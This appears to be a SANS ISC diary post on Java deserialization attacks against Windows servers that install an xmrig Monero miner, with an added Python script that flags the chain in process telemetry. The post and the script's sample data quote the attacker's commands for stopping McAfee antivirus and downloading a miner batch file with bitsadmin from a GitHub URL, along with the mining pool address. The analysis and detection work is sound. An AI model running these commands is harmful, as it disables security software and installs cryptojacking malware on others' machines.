Recently we talked a lot about attacks exploiting Java deserialization vulnerabilities in systems like Apache SOLR and WebLogic. Most of these attacks targeted Linux/Unix systems, but recently I am seeing more attacks that target Windows. For example:
The actual payload: turn off McAfee Antivirus (I am not sure why they only turn off McAfee. Any ideas?):

net stop "McAfee McShield"

Use bitsadmin to download the cryptominer and a batch file to start it from GitHub:

bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat "%cd%\xmrig.bat"

The batch file: first, it kills other xmrig processes (competition?). Next, it again turns off McAfee. It then starts the miner and connects to the monerohash.com pool on port 3333. It only uses 50% of the CPU, likely to evade detection. So far, this miner only "owns" about 350 hashes/second and has made a bit short of 40 Monero (about $7,000).
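As an added example (not part of the diary or of the captured payload), the Python below triages process-creation telemetry for the three observable steps of this chain: an AV service stopped with net, bitsadmin used as a downloader, and the miner binary or its pool endpoint on a command line. The events, the java.exe parent and the taskkill line are constructed sample data and assumptions, not the attacker's actual batch file.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation events (sample data for this
# example, not captured logs). Command lines mirror the chain in the diary:
# stop McAfee, fetch xmrig.bat with bitsadmin, kill rival miners, run xmrig
# against monerohash.com:3333. The parent process and taskkill are assumed.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "java.exe", "cmd": 'net stop "McAfee McShield"'},
    {"parent": "java.exe", "cmd": 'bitsadmin.exe /transfer "xmrig.bat" '
     '/download /priority foreground http://raw.githubusercontent.com/'
     'sirikun/starships/master/xmrig.bat "%cd%\\xmrig.bat"'},
    {"parent": "cmd.exe", "cmd": "taskkill /F /IM xmrig.exe"},
    {"parent": "cmd.exe", "cmd": "xmrig.exe -o monerohash.com:3333"},
    {"parent": "explorer.exe", "cmd": "bitsadmin.exe /list /allusers"},  # benign
]

# Each rule: name and a case-insensitive pattern over the full command line.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # BITS used as a downloader: /transfer plus /download plus a remote URL.
    ("bitsadmin_remote_download",
     re.compile(r"bitsadmin(\.exe)?\s.*?/transfer\b.*?/download\b.*?https?://", re.I)),
    # Endpoint protection stopped through the service control CLI.
    ("av_service_stop",
     re.compile(r"\bnet(1)?(\.exe)?\s+stop\s+\"?mcafee", re.I)),
    # Miner binary, or the pool endpoint the diary observed.
    ("xmr_miner",
     re.compile(r"\bxmrig(\.exe)?\b|monerohash\.com:3333", re.I)),
]


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (rule, severity, cmd) for every event that matches a rule.

    Severity is 'high' when the parent is a Java process, since the diary ties
    this chain to Java deserialization exploits (java.exe as parent is our
    assumption; the post shows no process tree)."""
    hits = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmd"]):
                sev = "high" if ev.get("parent", "").lower() == "java.exe" else "medium"
                hits.append((name, sev, ev["cmd"]))
    return hits


if __name__ == "__main__":
    for rule, sev, cmd in triage(SAMPLE_EVENTS):
        print(f"[{sev}] {rule}: {cmd}")
```

The bitsadmin download line is flagged twice (downloader plus miner filename), which is useful: a single event matching two rules is a stronger signal than either alone.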
Johannes, ISC Handler, Apr 3rd 2018